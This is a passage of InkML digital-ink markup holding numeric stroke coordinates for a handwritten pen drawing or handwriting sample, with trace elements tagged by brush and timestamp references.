0,-1 4-9 15,0-5-8-15,2 3-11 0,-2 2 1 0,0 0-11 16,0 0-7-16,0 0 4 0,-2-6-14 0,2 6-2 15,0 0-4-15,0 0 1 0,-14 11 1 0,0-2 1 16,0 3-2-16,-9 6 3 0,-6 3-4 16,-1-1-1-16,0 1-2 0,-4-1 0 15,5 0 0-15,-2-2-5 0,-1-1 0 0,6-2-6 0,-4 0 1 0,2-1-2 16,4 2-4-16,-2 1-1 0,8-6-4 16,-3 6-8-16,-2 0-23 0,9-4-25 0,-2 1-8 15,3 0-29-15,2 0-18 0,-2-1-8 0,4 0-21 16,3-3-9-16,0 0-9 0,-1-1-104 0,3-1-274 0,2-3 122 15</inkml:trace>
  <inkml:trace contextRef="#ctx0" brushRef="#br0" timeOffset="374.9998">16441 3373 88 0,'0'0'100'0,"0"0"-6"16,0 0-12-16,0 0-6 0,0 0-9 0,0 0-17 15,0 0-5-15,0 0 1 0,0 0-2 16,2 12-1-16,-2-5 16 0,3 2 8 0,-1 1 9 15,0 2-5-15,0 4-4 0,2 2-2 0,-1 1 5 16,-1 2 7-16,-1-3-4 0,3 1-11 0,-1-1-5 0,-2 2-6 16,2-1-4-16,-1 0-7 0,-1-1 4 0,1 0-7 15,-1-5-5-15,0 5-3 0,1 0-5 16,-1-3 6-16,0 2-8 0,0-4-1 0,3 3 2 16,-1-2-7-16,-2-2-1 0,-1 1-9 0,1-3-6 15,2-1-7-15,-1 1-28 0,-2 0-21 0,4 1-31 0,-3-6-25 16,1 0-22-16,0 4-114 0,0-6-268 15,0 1 119-15</inkml:trace>
  <inkml:trace contextRef="#ctx0" brushRef="#br0" timeOffset="690.293">16869 3660 24 0,'0'0'99'0,"0"0"-9"0,0 0-5 0,1 6-2 15,-1-6-2-15,0 0-8 0,-1 7-6 0,1-7-3 16,-4 9-5-16,3-6 1 0,-2 5-2 0,2 0-3 15,-2 2-2-15,1 0-7 0,-1 1 0 0,1-1-7 16,-4 1-6-16,4 2-10 0,-2-1 3 0,-1-1 3 16,0 0-12-16,1 4-25 0,-1 1-26 0,1-2-5 15,0-4-20-15,2 2-23 0,-6 2-83 0,7-4-179 16,-2 0 79-16</inkml:trace>
  <inkml:trace contextRef="#ctx0" brushRef="#br0" timeOffset="1209.1013">17087 3798 39 0,'-7'14'104'0,"-1"2"-3"0,0-1-18 15,-1-1 2-15,1-1-13 0,-3 1-7 0,2 0-5 16,3-1-3-16,-4 3-5 0,-1-2-11 0,5-2 1 16,-2-2-8-16,3 1-11 0,4-2-1 0,-5 0-10 15,4-2 1-15,-2-2-15 0,4 1 1 0,0-1-17 16,0-5-4-16,2 6 4 0,-2-6 3 0,6 6-4 16,-6-6 4-16,9 0-9 0,1-7-3 0,-1 2-2 15,4-5 2-15,5 0 0 0,-4-3 9 0,6-3-6 16,-4 3 3-16,-3-3 0 0,-1 2 5 15,2-1 9-15,1 3-7 0,-2-3 3 0,0 3 8 0,1 0-6 16,-3 0 5-16,1 1 1 0,1 5 0 0,-4-3-2 16,0 4 9-16,1 0 0 0,-1-2 6 0,0 3-7 15,-5 1-3-15,5 0 13 0,-5 2-14 0,-4 1 2 16,10-2 3-16,-10 2 2 0,10 4 9 0,-5-2 2 16,-1 3-1-16,0-1 2 0,1 4 3 0,-1 1 20 15,0 4 5-15,-2 1 6 0,2 2 18 0,-3 1 10 16,1 0-21-16,-4-1 0 0,2 0-11 0,-1 3 1 15,-3-2 16-15,2 2 0 0,-1-2-7 0,1 1-8 16,-1-1-4-16,2-1-3 0,-2-3-4 0,1-1-2 16,0-2-4-16,0 0-5 0,1 2-5 0,-1-2 0 15,0-2-12-15,0-2-26 0,1 0-25 0,1-1-19 16,0 0-19-16,-2-3-12 0,2-2-15 16,-3 4-108-16,3-4-229 0,0 0 103 0</inkml:trace>
  <inkml:trace contextRef="#ctx0" brushRef="#br0" timeOffset="1425.7548">17248 3605 70 0,'0'0'162'0,"2"-4"-12"0,-2 4-6 15,0 0-13-15,0 0-12 0,0 0-14 0,0-4-12 16,0 4-20-16,0 0-25 0,0 0-48 0,0 0-36 0,0 0-37 16,0 0-5-16,0 0-8 0,0 0-51 0,2 16-149 15,-3-10 65-15</inkml:trace>
  <inkml:trace contextRef="#ctx0" brushRef="#br0" timeOffset="2042.8464">17466 3841 31 0,'0'0'83'0,"0"0"-8"0,0 0-5 0,2 7 2 15,-2-2 0-15,0 6-3 0,0-1 4 0,0-1-10 16,0 6 4-16,0 4 1 0,-1-2 4 16,0 9 2-16,-1-8-1 0,1-1-11 0,1 1-9 15,-1-1-4-15,2-10-2 0,-1 5-8 0,0-8-2 16,-1 5-5-16,1-5-5 0,1 3-1 0,-1-4-1 16,1 0 4-16,1 1-3 0,-2-4-1 0,1 4 4 15,-1-4 6-15,4 2 7 0,-4-2 3 0,0 0-5 16,10-7-1-16,5-5-4 0,2 1-2 0,2-11-12 15,1 5 0-15,-1-5-3 0,-6 9 3 0,0 3 2 16,-3-2-6-16,-2-4-1 0,-1 7 4 0,2 1-3 16,-2-2 0-16,-2-1-5 0,0 3 1 0,2 0-4 15,-6 4 1-15,4-2-1 0,-2 4 3 0,-2-1-9 16,-1-2 4-16,0 5-5 0,5-6-3 0,-5 6 1 16,0 0 0-16,0 0-1 0,0 0 3 0,0 0-1 15,0 0 0-15,1 14-1 0,-1-6 3 0,-1 3-2 16,-4 0 1-16,5 2 1 0,0-3 0 0,0 3 0 15,0-1-4-15,0-1-2 0,0 1 4 0,4-2 4 0,-4 0-4 16,2 2 1-16,1-2-2 0,-2-1-1 16,3 2 6-16,-1-5-2 0,-1-3-2 0,1 3 2 15,1 0 5-15,-2-3 2 0,6 0 5 0,-2-3 6 16,3 0 6-16,1-3-4 0,2-3 0 0,2-3 1 16,4 2-2-16,-1-5-1 0,0-1-1 0,-4 3-3 15,1-3 6-15,0 2-4 0,-1-1-7 0,-3 0 4 16,-2 1-7-16,-3 1 3 0,4-2 0 0,-5 3-11 15,-2 1-15-15,2-4-8 0,0 7-18 0,-1-2-19 16,-2 1-17-16,0 4-29 0,-1 2-24 0,0-10-15 16,0 10-14-16,3-4-113 0,-3 4-295 0,0 0 131 15</inkml:trace>
  <inkml:trace contextRef="#ctx0" brushRef="#br0" timeOffset="2451.3912">17912 4156 5 0,'0'0'149'0,"0"0"-13"0,0 0-7 0,0 0-11 16,0 0-8-16,11-9-8 0,-4 3-14 0,-1 2-9 15,3-2 1-15,-3 0-9 0,1 1-5 0,0-1-3 16,3-2 3-16,2 3-8 0,-2-1-17 0,4-2 6 15,0-1-2-15,2 1-7 0,-5 1-3 0,-3 1-4 16,3 0 2-16,-6 4 3 0,2-1 3 0,-2-2 6 16,-1 2-1-16,0 2 1 0,-4 1 3 0,3-4-2 15,-3 4-2-15,4-1-2 0,-4 1-1 0,0 0-7 16,0 0-5-16,-7-5-7 0,-1 5-7 0,8 0-4 16,-22 3-4-16,10-1 0 0,1 1-1 0,-8 2-6 15,6 1 3-15,-1-3-5 0,4-1 0 0,1 3-7 16,-1-2 0-16,3 4-3 0,4-2 3 0,-3 2-4 15,3-2 7-15,0 4 0 0,3 1-9 0,1-2-7 16,2 2-4-16,1 1-11 0,1-2-12 0,3-1-5 16,0 3-17-16,1-3-15 0,0 0 4 0,7 1 1 15,-1 0-10-15,-4-2-3 0,6-2-4 0,-4 4-8 16,1-8-6-16,3 4-65 0,-1-1-192 0,-3-1 85 16</inkml:trace>
  <inkml:trace contextRef="#ctx0" brushRef="#br0" timeOffset="2855.4161">18548 4089 34 0,'4'7'78'0,"-4"-7"10"0,-9 16 9 15,1 0-6-15,-7 6-4 0,0-1 0 0,-2 3-4 16,2-5 6-16,3-5-25 0,1 1-11 0,2-2 0 15,-3 1-3-15,6 1-6 0,-1-4-3 0,2 0-8 16,3-3-1-16,-3 2 2 0,2-2-8 0,2-3-2 16,-2 1-5-16,3 0-3 0,0-6 2 0,2 11-3 15,0-7 1-15,1-1-7 0,-3-3 7 0,12 2-10 16,-12-2-1-16,18-4-10 0,-5 1-3 0,-1-5-7 16,5-1-5-16,0-3 4 0,-2 1-9 0,2-3 6 15,5-2 4-15,-7 3 3 0,-3 3 9 0,-3 1 1 16,2 1-12-16,-2-1 0 0,-1 3 6 0,-3 2 6 15,2-2-8-15,-3 2-5 0,1 0 13 0,-1 1-9 16,-4 3 5-16,7-3 0 0,-7 3 8 0,0 0-5 16,12 1 4-16,-12-1-3 0,5 5 13 0,-3 2 3 15,-1-1 2-15,0 0 6 0,-1 1-8 0,2 4 8 16,-5-1-6-16,0 1 4 0,0 0 0 0,-3 1 0 16,3 2-7-16,-2-2-7 0,0 0-31 0,-1 4-42 15,3-1-130-15,-8 0-214 0,9-3 96 0</inkml:trace>
  <inkml:trace contextRef="#ctx0" brushRef="#br0" timeOffset="3192.8791">19711 4060 160 0,'0'0'145'0,"0"0"-11"0,0 0-17 16,0 0-12-16,0 0-10 0,-4 14-1 0,-2 0 2 15,-7 10-5-15,-2 3-2 0,-4-1-10 0,-2 5-1 16,2-2-4-16,-11 12-9 0,10-11-6 0,-2-1-6 15,3 1-7-15,0-3-5 0,2-2 2 0,0-3-10 16,6-5-5-16,1 0 1 0,2 1-7 0,1-10-10 16,2 3-21-16,1-4-33 0,-1 0-14 0,2-2-20 15,1-1-29-15,-1 0-10 0,3-4-18 0,-1 4-76 16,1-4-227-16,0 0 101 0</inkml:trace>
  <inkml:trace contextRef="#ctx0" brushRef="#br0" timeOffset="3476.2095">19768 3970 50 0,'19'5'136'0,"2"0"-7"0,7 2 7 0,2 1 7 0,-1-1 3 15,-2 2-5-15,-8-5-16 0,3 1-8 16,-2 2 1-16,2-2-8 0,-3-3-9 0,0 4-8 16,-2 0-9-16,-2-5-9 0,2 3-8 0,-4 1-7 0,-1-2-7 15,0 0-29-15,-1 1-9 0,-2-2-43 0,-2 1-18 16,0 0-14-16,1-2-30 0,-3 2-16 0,-1 1-6 16,-1-1-16-16,-5 3-98 0,-1-1-245 0,-6 1 110 15</inkml:trace>
  <inkml:trace contextRef="#ctx0" brushRef="#br0" timeOffset="4105.5608">19719 4327 30 0,'2'4'152'0,"2"-2"-13"0,0-2 1 16,-4 0-9-16,11 1-1 0,-4 0-6 0,3 1-6 16,-2-2-10-16,3 1-11 0,0-1-11 0,5-1-8 15,1-2-9-15,-1 2-3 0,5 0-7 0,-6-4-3 0,4 3-7 16,-1-2-8-16,0 3-3 0,-5-2-1 0,2 2-5 16,-5-1-7-16,2-1-4 0,-3 2-2 0,-1 0 0 15,-2 1-5-15,-1-2-5 0,-5 2-4 16,10 0-1-16,-10 0 1 0,8 0-3 0,-8 0-5 0,0 0 3 15,5 1-3-15,-5-1 3 0,0 0-5 0,0 0 3 16,0 0 1-16,1 6-3 0,-1-6 5 0,-5 7 0 16,0 2-2-16,-1-1 3 0,-2 1-3 15,-1 0-1-15,1 1 0 0,1-2-1 0,-3 3 1 16,4-3 3-16,1 1-3 0,0 0-2 0,1 1 3 0,2-3 0 16,-1 2-4-16,1 1 3 0,4 0 2 0,-1-2 2 15,1 0-5-15,0 0 0 0,1-4 2 0,3 6-2 16,-2-2 6-16,3 1-3 0,-1-4-1 0,0-2 0 15,-1 1-4-15,3-1 6 0,1-1-4 0,2 0 5 16,2-5 1-16,1 2-3 0,-2-2 4 0,-2 0-5 16,0 1 4-16,3 0-1 0,0-4 1 0,-3-2 3 15,2 3-7-15,-1-1 2 0,-3-1 4 0,2 3-3 16,-2-4 0-16,-1 2 3 0,-2 2 9 16,1 0 11-16,-3 0 7 0,1 1 3 0,-1-1 3 15,-3 4-5-15,2-2-2 0,3-1-5 0,-5 3-7 0,0 0-5 16,0 0 1-16,0 0-1 0,0 0 3 0,4 12 11 15,-8-3 8-15,-2 8 1 0,2-2 0 0,-5 3-2 16,3 2 2-16,-1-2-7 0,0 0 0 0,0-3-6 16,1 1 2-16,1 1-5 0,1-1-1 0,-1-3-2 15,1-1 0-15,0 0-2 0,3 0-4 0,-2 0-5 16,0-2-14-16,1-2-20 0,0-3-25 0,0 1-28 16,1-1-25-16,-3 0-17 0,4 0-18 0,-1-3-27 15,1-2-156-15,0 0-347 0,0 0 153 0</inkml:trace>
  <inkml:trace contextRef="#ctx0" brushRef="#br0" timeOffset="5505.3559">15898 3896 18 0,'2'-4'88'0,"-2"4"0"0,0 0-10 0,0 0-5 15,0 0 0-15,0 0-7 0,0 0-7 0,0 0-3 16,0-4-1-16,0 4-3 0,0 0-9 0,0 0-1 16,0 0-1-16,0 0-3 0,0 0-4 0,0 0-6 15,0 0-4-15,0 0-7 0,0 0 3 0,0 0-5 16,0 0-4-16,0 0 6 0,0 0-5 0,0 0-2 16,9 10 6-16,-3-5-1 0,1 2-4 0,-1 0-4 15,2 1-5-15,-3 1 9 0,5 0 3 0,2 3-4 16,-1-1 0-16,-1 2-7 0,2 0 1 0,-1-1 0 15,2 2-2-15,-1 1 5 0,0-2-2 0,0 0 2 16,1 1 7-16,-2-2 1 0,2-2-13 0,1 1-1 16,-5-2 4-16,5 3-1 0,-5-5-1 0,0 1 0 15,1 0 0-15,-1-2 0 0,0 2 2 0,0-5-1 16,0 4 3-16,-4-2-7 0,2-1 2 0,-2 1-7 16,1 0 3-16,0-2-1 0,-1 1 3 0,1-3 3 15,-1 3-1-15,0-1 13 0,0 0-19 0,0 0-11 16,1-2-24-16,-2 3-16 0,5-3-33 0,-5-1-90 15,2 3-192-15,-1-2 84 0</inkml:trace>
  <inkml:trace contextRef="#ctx0" brushRef="#br0" timeOffset="7037.1858">16156 3943 25 0,'0'0'27'0,"0"0"-4"0,0 0 0 15,0 0-4-15,0 0-2 0,0 0 5 0,-4-2-5 16,4 2-2-16,0 0-1 0,-8-3 6 0,8 3-2 15,0 0 1-15,-5-4-4 0,1 4-5 0,4 0 0 16,-10-1 0-16,10 1-5 0,-5-3 6 0,5 3-11 16,-8-2 4-16,8 2 1 0,-9 0 1 0,9 0-8 15,-9 2 6-15,9-2 2 0,-5 3-3 16,1-2 1-16,1 2 1 0,-3-1-2 0,4 2-7 0,-3-1 7 16,0 0 0-16,2 1-1 0,-2 0-7 0,1 2 12 15,0 1-8-15,0 0 1 0,1 1 0 0,-1 4-2 16,2-1 7-16,-1 2-11 0,0-1 7 15,2 2-2-15,1 2 1 0,-1-1 1 0,1-1 1 0,0 0-3 16,1 0 0-16,-1-3 3 0,1-1-4 0,1-1 0 16,0 3-3-16,0-7-3 0,1 2 1 0,1 0-1 15,-2-3 6-15,2 0 0 0,-1 3-4 0,1-3 1 16,2-2 2-16,-1 1 1 0,2 0 1 0,0-2 0 16,-2 1 5-16,9-2-3 0,-5-3-1 0,0 2 1 15,4-4 2-15,-3 4 0 0,2-2 1 0,-2-2 0 16,-5 0 0-16,3 0 8 0,-3 1 2 0,0 0-4 15,0-2 3-15,-1 1 6 0,0 0 2 0,-2-2-3 16,0 0-1-16,-1 0 0 0,0 0 6 0,1-3-2 16,-2 0 1-16,-2 1-2 0,0 0 0 0,-1 1 2 15,0 1-5-15,1-3 6 0,-2 1-6 0,0 2 2 16,2 2 2-16,-2-4 3 0,0 4-4 0,2-1-4 16,-1-1 2-16,-1 2 1 0,4 1 4 0,-4-2 2 15,3 2-5-15,-3 1 1 0,4 0-6 0,0 3 4 16,-2-6-4-16,2 6-2 0,-3-6-1 0,3 6-3 15,-4-3-3-15,3 1-4 0,1 2-10 0,0 0-12 16,0 0-25-16,0 0-22 0,0 0-14 0,0 0-46 16,0 0-135-16,0 0 60 0</inkml:trace>
  <inkml:trace contextRef="#ctx0" brushRef="#br0" timeOffset="10369.2144">19900 4757 15 0,'0'0'55'15,"-1"-4"12"-15,0 1-11 0,1 3 0 0,-3-7-1 16,2 5-7-16,1 2-6 0,-3-4 1 0,3 4 6 16,-2-5-9-16,0 2-5 0,2 3 7 0,-1-5-11 15,-2 1-1-15,3 4 8 0,-2-5-14 0,2 5 4 16,-2-5-3-16,2 5-2 0,-2-6 4 0,2 6-1 15,-1-5 0-15,-3 2-4 0,4-2 9 0,0 5-11 16,-1-3-3-16,-2-3 2 0,3 6-11 0,-5-4 7 16,4-1 10-16,-2 2-8 0,2-1 4 0,-3 1-6 15,-1-1 3-15,3 0-4 0,-2 0-6 0,0 0 2 16,-1 1-3-16,1 0 9 0,-3-1-12 0,1 0 5 16,1 2-10-16,-3-2 10 0,-1 2-10 0,-1-2 6 15,1 1 3-15,0 1-8 0,-1 0 5 0,-1 1-12 16,0-1 16-16,1 1-14 0,0 0 2 0,3 1-2 15,-4-2 5-15,1 3 1 0,-1 0-5 0,1-1-4 16,0 2 9-16,1 2 0 0,0 0-5 0,0-2 8 16,-1 4-10-16,1-2 8 0,-5 0-1 0,2 3-6 15,-1 2 10-15,-3-1 5 0,7 1-18 0,-5 3 9 16,4-5 0-16,-4 4-4 0,5-3 2 0,1 1-4 16,2-3 2-16,0 1-6 0,0-1 7 0,1-1-9 15,1 1 8-15,-1-1 0 0,3 0-3 0,-1-1 0 16,-1 0 9-16,2 1-3 0,-2-2-1 0,3 1-3 15,-2-2 1-15,2 3 10 0,-2-3-16 0,1 3 3 16,2 1 12-16,0-6-10 0,0 6 4 0,-3-4 1 16,3-2-9-16,0 7 8 0,0-7-7 0,0 5-1 15,0-5 2-15,0 5 9 0,0-5-3 0,0 5 3 0,0 1-5 16,3-4-3-16,-3-2 4 0,0 0 5 16,0 4-9-16,0-4 0 0,0 0 5 0,2 2-2 15,-2-2-6-15,0 0 5 0,2 3 5 0,-2-3-3 16,3 3-4-16,-3-3 3 0,0 0-10 0,0 0 7 15,0 0 4-15,0 0 0 0,4 3-11 0,-4-3 21 0,0 0-9 16,0 0-4-16,0 0 9 0,0 0 2 0,0 0-5 16,0 0-8-16,0 0 7 0,2 2 2 15,-2-2-8-15,0 0 14 0,0 0-9 0,0 0 4 16,0 0 0-16,0 0-8 0,0 0 4 0,0 0 1 16,0 0 0-16,0 0-4 0,0 0 6 0,0 0 10 15,0 0-15-15,0 0-3 0,0 0-1 0,0 0 4 0,0 0 3 16,0 0-5-16,0 0 3 0,0 0 1 15,8-5 3-15,-8 5 5 0,0 0-7 0,0 0-1 16,0 0-6-16,0 0 1 0,8 0 15 0,-8 0-13 0,0 0 10 16,1-4-7-16,-1 4-1 0,0 0 10 0,0 0-9 15,6-2-5-15,-6 2 7 0,0 0 5 0,0 0-1 16,0 0-9-16,0 0 10 0,0 0 3 0,3-1-3 16,-3 1-8-16,0 0 22 0,0 0-19 0,0 0 5 15,0 0-4-15,3-4-8 0,-3 4 2 0,0 0 4 16,3-1 4-16,-3 1-9 0,0 0 5 0,0 0 2 15,1-6-2-15,-1 6 10 0,2-4-5 0,2 1-1 16,-4 3-13-16,5-3 4 0,-5 3 2 0,4-5 11 16,-1 3-9-16,-1-1-1 0,-2 3 3 0,3-4 4 15,-3 4 0-15,2-2-2 0,-2 2-9 0,2-5 15 16,-2 5-10-16,4-3-3 0,-2 1-4 0,-2 2 20 16,4-4-15-16,-4 4 4 0,4-5-4 0,-3 1 5 15,0 1-4-15,2-1 4 0,1 1-3 16,-4 3 8-16,2-7 3 0,-1 5 7 0,-1 2-4 0,2-6 2 15,0 4-2-15,-2 2-2 0,4-9 1 0,-3 6-3 16,1-1-4-16,0 1 4 0,-1-1 2 0,1-3-4 16,0 4-3-16,-2-1 2 0,2 0-7 0,-2 4-4 15,0-6 5-15,0 3 8 0,0 3-2 0,0-5 2 16,0 5-3-16,2-8-1 0,-2 8 0 0,-2-3-5 16,0 0-3-16,2 3 4 0,0-8-1 0,0 8 10 15,2-4-6-15,-2 4-1 0,0-4 1 0,0 4-3 16,-2-6 4-16,2 6-1 0,-2-4-1 0,2 4 5 15,-3-5-8-15,3 5 0 0,-4-2-8 0,4 2 5 16,-1-6 8-16,1 6-7 0,-2-5-2 0,2 5-1 16,-2-4 14-16,2 4-7 0,0-4 2 0,0 4-8 15,0 0-2-15,-2-6 7 0,2 6-4 0,-2-4 6 16,2 4-3-16,-3-2-9 0,3 2 11 0,-2-4-1 16,2 4 3-16,0 0-2 0,-2-4-7 0,2 4-4 15,0 0 14-15,-3-3-1 0,3 3-3 0,-1-4-4 16,1 4 4-16,0 0-6 0,0 0-1 0,0 0 12 15,0 0-12-15,-3-2 3 0,3 2-7 0,0 0 1 16,0 0-7-16,0 0 9 0,0 0-7 0,0 0 0 16,0 0 0-16,0 0-4 0,0 0 5 0,0 0 10 15,0 0-14-15,0 0 6 0,0 0-1 0,0 0-4 16,0 0-2-16,0 0 2 0,0 0 15 0,0 0-17 0,0 0-3 16,0 0 2-16,0 0 1 0,0 0-17 15,0 0 0-15,0 0-7 0,0 0 1 0,0 0-5 16,0 0 0-16,0 0-1 0,0 0-4 0,0 0 9 15,0 0 5-15,0 0 0 0,0 0 3 0,0 0 4 16,0 0 0-16,0 10 4 0,0-10 1 0,0 0-3 0,-1 4 5 16,1-4 0-16,0 0 2 0,0 5 6 15,0-5 1-15,0 0 0 0,0 0-2 0,0 5 1 16,0-5 0-16,0 0 9 0,0 0-1 0,0 6 1 16,0-6-1-16,1 3-1 0,-1-3 0 0,0 0 0 15,-1 4 5-15,1-4-2 0,1 5 4 0,-1-5-3 0,0 0-3 16,0 0 3-16,0 0 1 0,0 0 3 15,0 0-6-15,0 0 6 0,0 0-1 0,0 0 1 16,0 4 4-16,0-4 4 0,0 0 2 0,0 0-1 16,3 3 4-16,-3-3 6 0,0 0-6 0,0 0 13 0,0 0-4 15,0 0-5-15,0 0 3 0,0 0 2 0,0 0-5 16,0 0 5-16,0 0-5 0,0 0 0 16,0 0-2-16,0 0-3 0,0 0-2 0,0 0 1 0,0 0-1 15,0 0 1-15,0 0-5 0,0 0-4 16,0 0 1-16,0 0 1 0,0 0 0 0,0 0 6 0,0 0-3 15,9-1-11-15,-9 1 10 0,4 2-2 0,-2 0 1 16,-2-2-3-16,10 4 1 0,-6-1 6 0,0 0-10 16,1 0 4-16,-1 1 0 0,1-3-5 15,-1 3 1-15,2 1 6 0,-2-2-7 0,1-1 7 16,1 1-14-16,-3 0 12 0,1 2 0 0,1-2-4 0,3 0 6 16,-3 0 0-16,0 1-5 0,2 1-2 0,-2-1 5 15,2-1 5-15,0 3-9 0,-2-2 2 0,3 2 2 16,-1-3 5-16,-1 2-5 0,1 0-4 15,-3-2 0-15,1 1 11 0,4-1-10 0,-4 2 1 0,0 0-4 16,1-1 8-16,1-1 1 0,-2 1-3 0,3-1 0 16,-3 1 1-16,1 0 1 0,3-1-1 0,-3 0 1 15,-2 0-3-15,3 1 3 0,-1 0-5 0,-1-2 3 16,-1 1 0-16,2 0 3 0,-2-1-10 0,1-1 8 16,-1 0 4-16,0 2-14 0,1 0 8 0,-2 1 7 15,-3-4 0-15,7 0 0 0,-7 0-2 0,7 3-4 16,-7-3-4-16,2 0 9 0,-2 0-3 0,4 3-3 15,-4-3 9-15,0 0-4 0,5 1 8 0,-5-1-1 16,0 0-1-16,0 0-2 0,0 0-1 0,0 0 6 16,0 0 4-16,0 0-12 0,0 0 9 0,0 0 2 15,0 0-3-15,0 0 2 0,0 0-3 0,0 0 6 16,0 0-1-16,0 0-12 0,0 0 4 0,0 0-4 16,0 0 3-16,0 0-1 0,0 0-11 0,0 0-8 15,0 0-7-15,0 0-23 0,0 0-22 0,0 0-25 16,0 0-59-16,-6 8-157 0,6-8 71 0</inkml:trace>
  <inkml:trace contextRef="#ctx0" brushRef="#br0" timeOffset="11301.2533">15211 4087 48 0,'32'15'82'0,"12"6"-6"0,3 2-15 16,3-2 3-16,2 1-12 0,7 3-1 0,25 9-3 16,-26-12-1-16,29 15-6 0,-5-2-9 0,0-1-5 15,4-1 2-15,-4 3 3 0,6 2-7 0,2 2 5 16,0 4 6-16,6-2-12 0,0 1 4 0,0 2-6 15,1 3 15-15,1-5-2 0,-7 2 9 0,1-3-13 0,0-3-1 16,-1-2-4-16,-1 1 4 0,3 2 3 16,-1-5 7-16,-1-1 4 0,1-4-3 0,7-1 3 15,-1-3 6-15,1-1 3 0,7-5-5 0,0 3 4 16,0-4-5-16,-5 0 0 0,-1-1-3 0,2-1 1 16,-3-4 5-16,4-4-1 0,-1-1-1 0,-2-5-3 15,-2 3-4-15,-1-3 1 0,-8 1-3 0,-27-5-3 16,30-2-4-16,-32 3 4 0,1 0-10 0,1 0 2 15,-2-3-3-15,-4-1-6 0,-1 2-1 0,-4-1 3 16,-12 1-3-16,-3 0-3 0,-2-2-2 0,-1-1 0 16,-1-1 3-16,-4-1-8 0,-6 4-1 0,-4-2 6 15,1-2 1-15,-1 1 0 0,-1-5 2 0,2 1 0 16,2-10-3-16,1 0-2 0,4-2 1 0,-1-3-2 16,0-4-1-16,-5-1 0 0,3-1 2 0,1-12-4 0,-8 12 4 15,0-15 5-15,-5 12-10 0,-1-13-3 0,-1-4-4 16,-4 4 1-16,-6-4 0 0,1-1-4 15,-7 0 0-15,1 3-5 0,-8-5 1 0,0 0-4 16,-5-1 1-16,-8 4-2 0,-3-4 0 0,-16-19-15 0,10 25-8 16,-19-25-3-16,-6 5-3 0,-3 3-5 0,-8 3-12 15,-3-1 7-15,-4 1 1 0,-3 5 1 0,-2 2 9 16,-7 1-2-16,-1 4-1 0,-4 1 9 0,-3 0-5 16,-9-4 0-16,5 5 0 0,-2 3 4 15,3-3-7-15,-2 5 9 0,2-1 0 0,1 8-3 0,0-1 1 16,4-2 2-16,1 16 3 0,-2-5 2 0,9 2-8 15,1 6 7-15,-4 4-6 0,1 1 8 0,25 9-5 16,-37-1-3-16,-1 16-12 0,-3 6-6 0,-1 16-4 16,-7 8-8-16,3 12-12 0,-8 12-78 0,-13 13-168 15,-4 11 75-15</inkml:trace>
  <inkml:trace contextRef="#ctx0" brushRef="#br0" timeOffset="15495.5864">21390 2682 46 0,'-2'-2'96'0,"2"2"-13"0,0 0-12 16,-4-2 2-16,4 2-13 0,0 0 5 0,-13 3-10 15,3-2-4-15,2 2-12 0,-2 0 7 0,-4 3-11 0,1-2-1 16,-1 2-6-16,-8 3 0 0,3-2-11 0,1 2 6 16,-1 0 0-16,-5 5-8 0,0 2-6 15,-1-5-7-15,6-1-14 0,1 3-31 0,4-3-21 16,-5 1-66-16,4 0-142 0,0 0 63 0</inkml:trace>
  <inkml:trace contextRef="#ctx0" brushRef="#br0" timeOffset="15775.6988">21356 2464 109 0,'0'0'102'0,"5"9"-2"0,-5 1-14 16,0 5 9-16,0 1-16 0,-4 3-7 0,4 0-6 16,-4 6-11-16,-1 0 3 0,1 3-5 0,-1-2 0 15,0 0 2-15,-4 2-11 0,9-3 0 0,-4 0-15 16,1 2-1-16,1-2-22 0,1-10-17 0,-3 1-15 15,4-2-10-15,0 1-19 0,0 1-7 0,-3-3-13 16,6-4-71-16,-3 4-156 0,4-3 70 0</inkml:trace>
  <inkml:trace contextRef="#ctx0" brushRef="#br0" timeOffset="16006.3108">21767 2755 2 0,'0'4'93'0,"0"-4"-1"0,0 7-5 16,0-3-4-16,-1 0 2 0,-2 1-11 0,1 3-3 16,0-2-11-16,0 3 10 0,-2 1-16 0,0-2-17 15,1-1-6-15,1 3-25 0,1-2-10 0,-3 0-23 16,2-1-8-16,0 2-13 0,2-2-20 0,-1-1-43 15,2 0-119-15,1 1 52 0</inkml:trace>
  <inkml:trace contextRef="#ctx0" brushRef="#br0" timeOffset="16415.3383">22000 2919 19 0,'-10'8'93'0,"2"-1"-6"0,-1 1-13 16,0-3 3-16,1 1-14 0,3 0-2 0,-1-3-1 15,2 0-6-15,2 1-3 0,2-4-12 0,-5 8-8 16,5-8 5-16,-2 2-12 0,2-2 3 16,0 0-3-16,0 0-3 0,0 0-4 0,0 0-3 15,0 0 2-15,23 1-1 0,-14-3 8 0,10-5-13 16,-3 1 10-16,3 0-8 0,-1-1-6 0,0-1 5 0,-1 1 10 15,-1-3-16-15,2 3 8 0,-3 1-10 0,-4 0 8 16,2 4-5-16,-5-3 1 0,-4 2-5 16,5 0 5-16,-3 0-6 0,-2 0-4 0,-1 2 8 15,-3 1-6-15,7 0 6 0,-7 0-8 0,0 0 5 16,0 0-1-16,8 3 4 0,-8-3-5 0,-2 12 12 16,2-5 12-16,0 4 0 0,-3-2 0 0,0 3 7 0,-2 2-3 15,1-4 1-15,-5 4-5 0,3-3-5 0,0-1 10 16,2-1-16-16,1 0-1 0,1 0-4 15,-2-2-13-15,1-1-13 0,3-1-9 0,-4 0-23 16,4-5-11-16,0 8-1 0,0-8-3 0,-4 4-22 16,4-4-76-16,0 0-176 0,0 0 79 0</inkml:trace>
  <inkml:trace contextRef="#ctx0" brushRef="#br0" timeOffset="16579.9861">22251 2617 62 0,'1'-3'78'15,"-1"3"-26"-15,0 0-31 0,0 0-2 0,0 0-8 16,0 0-18-16,-1 16-14 0,-1-7-16 0,-3 5-38 16,1-1 17-16</inkml:trace>
  <inkml:trace contextRef="#ctx0" brushRef="#br0" timeOffset="17129.2803">22323 3056 81 0,'-5'7'102'0,"-1"5"-1"15,1-2 2-15,1-2-11 0,-1 2 1 0,2 1-17 16,1-5-14-16,-1-1-8 0,3 0-3 0,-1 2 2 16,2-3-20-16,0 1 9 0,2 1-13 0,1-1 9 15,1 0-4-15,5-1-1 0,3 0-3 0,5-3 4 16,3 1 5-16,10-2-11 0,-3-4-6 0,0 0 2 16,3-2 3-16,-4-1 1 0,-2-4-8 0,-5 4 2 15,-1 0 5-15,-2 0 1 0,-4 1 4 0,-1 2 11 16,-6-1 5-16,3 1-6 0,-4 0 6 0,2 2-4 15,-2-1 4-15,-4 0-8 0,-1 3 2 0,9-2-10 16,-8 0-2-16,-1 2-7 0,0 0-1 0,0 0-5 16,4-3-2-16,-4 3 4 0,0 0-9 0,0 0 2 15,0 0-3-15,0 0-3 0,0 0-6 0,0 0 2 16,0 10 6-16,-1-7-2 0,-2 